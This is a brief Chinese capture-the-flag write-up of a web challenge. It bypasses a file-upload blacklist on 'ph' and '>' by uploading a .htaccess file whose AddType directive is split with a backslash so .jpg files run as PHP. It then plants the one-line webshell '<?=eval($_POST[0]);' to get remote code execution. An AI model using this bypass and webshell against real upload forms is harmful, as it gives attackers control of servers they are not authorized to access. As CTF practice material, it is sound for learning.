web就会这一道的我实在是tcl,看来还得多多练习

尝试上传一般文件,过滤了ph和>

黑名单过滤

尝试上传.htaccess文件

Addtype application/x-httpd-p\
hp .jpg

用 \ 换行拼接绕过黑名单上传

上传.jpg文件,写入一句话,这里采用php短标签绕过

<?=eval($_POST[0]);

在php5.4.0以后,<?=总是可用

<?=等价于,<?php echo

上传后即可RCE


花びらは笑った.